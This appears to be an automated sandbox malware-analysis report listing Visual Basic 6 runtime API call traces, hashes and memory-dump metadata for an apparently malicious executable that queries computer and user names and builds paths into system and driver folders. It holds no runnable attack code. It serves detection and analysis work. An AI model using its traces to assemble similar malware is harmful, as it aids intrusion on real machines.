                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EB19
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$Error$#525#537#616AnsiBstrChkstkNameOverflowUnicodeUser
                                                                                    • String ID:
                                                                                    • API String ID: 281739284-0
                                                                                    • Opcode ID: 51ebf8c25856d226b4dcde5673b463cf0edb45b4d208a7711fc342866f12040b
                                                                                    • Instruction ID: 1a108948efa492097ea428c0624f2b892237f430c038d1a03950295591b49aee
                                                                                    • Opcode Fuzzy Hash: 51ebf8c25856d226b4dcde5673b463cf0edb45b4d208a7711fc342866f12040b
                                                                                    • Instruction Fuzzy Hash: 5D31CA75900249EFDB04EFA4DE4DBDEBBB8EB08715F108269E502B62A0DB745944CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040A840 Relevance: 809.7, APIs: 448, Strings: 13, Instructions: 2988COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040A85E
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,Function_000032B6), ref: 0040A8B6
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040A91C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000068), ref: 0040A97C
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040A9A5
                                                                                    • __vbaEnd.MSVBVM60 ref: 0040A9BD
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040A9DD
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AA43
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,0000007C), ref: 0040AA9E
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040AAB9
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406300,000001BC), ref: 0040AAFD
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040AB2F
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 0040AB95
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040ABF2
                                                                                    • #618.MSVBVM60(?,00000001), ref: 0040AC10
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040AC1B
                                                                                    • __vbaStrCmp.MSVBVM60(00406544,00000000), ref: 0040AC27
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040AC45
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,Function_000032B6), ref: 0040AC51
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,Function_000032B6), ref: 0040AC80
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040ACE6
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040AD43
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040AD74
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040AD7D
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,Function_000032B6), ref: 0040ADA2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AE08
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040AE65
                                                                                    • __vbaStrCat.MSVBVM60(00406544,?), ref: 0040AE86
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040AE91
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040AE9A
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040AEA3
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040AEB8
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040AECC
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040AED9
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040AEE9
                                                                                    • __vbaStrMove.MSVBVM60(00000025,?,?,?,?,?,Function_000032B6), ref: 0040AF05
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0040AF12
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0040AF1B
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,Function_000032B6), ref: 0040AF3B
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AFA1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000058), ref: 0040AFFE
                                                                                    • __vbaStrCat.MSVBVM60(?,?), ref: 0040B01E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B029
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B035
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B040
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B04E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B059
                                                                                    • #517.MSVBVM60(00000000), ref: 0040B060
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B06B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B078
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B094
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0A0
                                                                                      • Part of subcall function 00429CA0: __vbaSetSystemError.MSVBVM60(00000064,004031C0,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429CF6
                                                                                      • Part of subcall function 00429CA0: #525.MSVBVM60(00000200,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D05
                                                                                      • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D16
                                                                                      • Part of subcall function 00429CA0: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D20
                                                                                      • Part of subcall function 00429CA0: SHGetPathFromIDList.SHELL32(?,00000000), ref: 00429D30
                                                                                      • Part of subcall function 00429CA0: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D3A
                                                                                      • Part of subcall function 00429CA0: __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D43
                                                                                      • Part of subcall function 00429CA0: #537.MSVBVM60(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D50
                                                                                      • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5B
                                                                                      • Part of subcall function 00429CA0: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5F
                                                                                      • Part of subcall function 00429CA0: #616.MSVBVM60(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D73
                                                                                      • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D7E
                                                                                      • Part of subcall function 00429CA0: __vbaStrCat.MSVBVM60(00406544,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D86
                                                                                      • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D91
                                                                                      • Part of subcall function 00429CA0: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D9D
                                                                                      • Part of subcall function 00429CA0: __vbaFreeStr.MSVBVM60(00429DEF,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DE8
                                                                                    • __vbaStrMove.MSVBVM60(00000024,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0B9
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0C6
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0CF
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0F8
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B105
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B115
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B131
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B13C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B14A
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B155
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B161
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B16C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B179
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B184
                                                                                    • #517.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B18B
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B196
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B1A3
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B1BF
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040B1EB
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B1F8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B208
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B223
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B22E
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B23C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B247
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B253
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B25E
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B26C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B277
                                                                                    • #517.MSVBVM60(00000000), ref: 0040B27E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B289
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B296
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B2B2
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B2CA
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B2DC
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040B2FC
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040B303
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B30E
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B31B
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040B333
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B34B
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B35D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B368
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040B37D
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040B384
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B38F
                                                                                    • #517.MSVBVM60(00000000), ref: 0040B396
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B3A1
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B3AE
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B3CA
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B3E2
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040B3F6
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B403
                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000), ref: 0040B43C
                                                                                    • #669.MSVBVM60 ref: 0040B449
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B454
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B461
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040B46A
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B483
                                                                                    • __vbaStrCmp.MSVBVM60(00406F10,?), ref: 0040B49C
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B4BD
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B4E9
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B502
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B50D
                                                                                    • __vbaEnd.MSVBVM60(0042C0D4), ref: 0040B54C
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040BA5E
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BA6B
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BA7B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BA93
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040BAA7
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BAB4
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BAC4
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BADC
                                                                                      • Part of subcall function 00429CA0: __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DB5
                                                                                    • __vbaStrMove.MSVBVM60(0000001C), ref: 0040BAEE
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BB03
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040BB0A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BB15
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BB22
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BB3A
                                                                                    • __vbaStrMove.MSVBVM60(00000026), ref: 0040BB56
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BB63
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040BB6C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BB81
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040BB93
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BB9E
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BBB3
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040BBBA
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BBC5
                                                                                    • #517.MSVBVM60(00000000), ref: 0040BBCC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BBD7
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BBE4
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040BC00
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BC18
                                                                                    • __vbaStrMove.MSVBVM60(0000001A), ref: 0040BC2A
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BC3F
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040BC46
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BC51
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BC5E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BC76
                                                                                      • Part of subcall function 0041E880: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,0040BC8B), ref: 0041E89E
                                                                                      • Part of subcall function 0041E880: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8CE
                                                                                      • Part of subcall function 0041E880: #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8E0
                                                                                      • Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E8EB
                                                                                      • Part of subcall function 0041E880: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041E8FC
                                                                                      • Part of subcall function 0041E880: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041E911
                                                                                      • Part of subcall function 0041E880: GetComputerNameA.KERNEL32 ref: 0041E91D
                                                                                      • Part of subcall function 0041E880: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041E92B
                                                                                      • Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E934
                                                                                      • Part of subcall function 0041E880: #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041E949
                                                                                      • Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E954
                                                                                      • Part of subcall function 0041E880: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041E95D
                                                                                      • Part of subcall function 0041E880: #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041E96D
                                                                                      • Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E978
                                                                                      • Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E981
                                                                                      • Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(0041E9B5,?,?,?,00000000,Function_000032B6), ref: 0041E9AE
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BC90
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BC9D
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040BCA6
                                                                                      • Part of subcall function 0041E9D0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041E9EE
                                                                                      • Part of subcall function 0041E9D0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA1E
                                                                                      • Part of subcall function 0041E9D0: #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA30
                                                                                      • Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA3B
                                                                                      • Part of subcall function 0041E9D0: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041EA4C
                                                                                      • Part of subcall function 0041E9D0: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA61
                                                                                      • Part of subcall function 0041E9D0: GetUserNameA.ADVAPI32(00000000), ref: 0041EA6D
                                                                                      • Part of subcall function 0041E9D0: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA7B
                                                                                      • Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA84
                                                                                      • Part of subcall function 0041E9D0: #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041EA99
                                                                                      • Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAA4
                                                                                      • Part of subcall function 0041E9D0: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041EAAD
                                                                                      • Part of subcall function 0041E9D0: #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041EABD
                                                                                      • Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAC8
                                                                                      • Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAD1
                                                                                      • Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(0041EB05,?,?,?,00000000,Function_000032B6), ref: 0041EAFE
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BCBD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BCCA
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040BCD3
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 0040BCEE
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040BD61
                                                                                    • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040BD7A
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0040BD90
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040BD9F
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 0040BDC1
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BDD6
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040BDEA
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BDF7
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BE07
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BE1F
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040BE33
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BE40
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BE50
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BE68
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040BE7A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BE85
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BE9A
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040BEA1
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BEAC
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BEB9
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BEE9
                                                                                    • __vbaStrCat.MSVBVM60(system32\drivers\,00000000), ref: 0040BEFB
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BF06
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BF1B
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040BF22
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BF2D
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BF3A
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BF52
                                                                                      • Part of subcall function 00415EC0: __vbaSetSystemError.MSVBVM60(660E6C30,660E6A76,00000000), ref: 00415F0F
                                                                                      • Part of subcall function 00415EC0: __vbaNew2.MSVBVM60(00406520,0042CC34,660E6C30,660E6A76,00000000), ref: 00415F27
                                                                                      • Part of subcall function 00415EC0: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 00415F4C
                                                                                      • Part of subcall function 00415EC0: __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100), ref: 00415F76
                                                                                      • Part of subcall function 00415EC0: __vbaSetSystemError.MSVBVM60(0000000D,00416130,?,00000000), ref: 00415F8F
                                                                                      • Part of subcall function 00415EC0: __vbaFreeObj.MSVBVM60 ref: 00415F9E
                                                                                      • Part of subcall function 00416000: __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416050
                                                                                      • Part of subcall function 00416000: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416075
                                                                                      • Part of subcall function 00416000: __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041609F
                                                                                      • Part of subcall function 00416000: __vbaSetSystemError.MSVBVM60(0000000E,00417A20,?,00000000,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160B8
                                                                                      • Part of subcall function 00416000: __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160C7
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BF8E
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040BFD4
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040BFEF
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040C008
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C013
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C021
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C02C
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040C038
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C043
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C050
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C05B
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000), ref: 0040C088
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040C0B2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C0BD
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C0CB
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C0D6
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040C0E2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C0ED
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C0FB
                                                                                    • #600.MSVBVM60(?,00000002), ref: 0040C111
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C12B
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040C137
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C2F3
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C300
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C310
                                                                                    • __vbaStrMove.MSVBVM60(0000001C), ref: 0040C32C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C339
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040C342
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C357
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C36B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C378
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C388
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C3A5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C3B0
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C3BD
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040C3C6
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C3DB
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C3EF
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C3FC
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C40C
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 0040C423
                                                                                    • #616.MSVBVM60(00000000,-00000001), ref: 0040C439
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C444
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C451
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040C45A
                                                                                    • #709.MSVBVM60(00000000,00406544,000000FF,00000000), ref: 0040C477
                                                                                    • #631.MSVBVM60(00000000,?,0000000A), ref: 0040C4AC
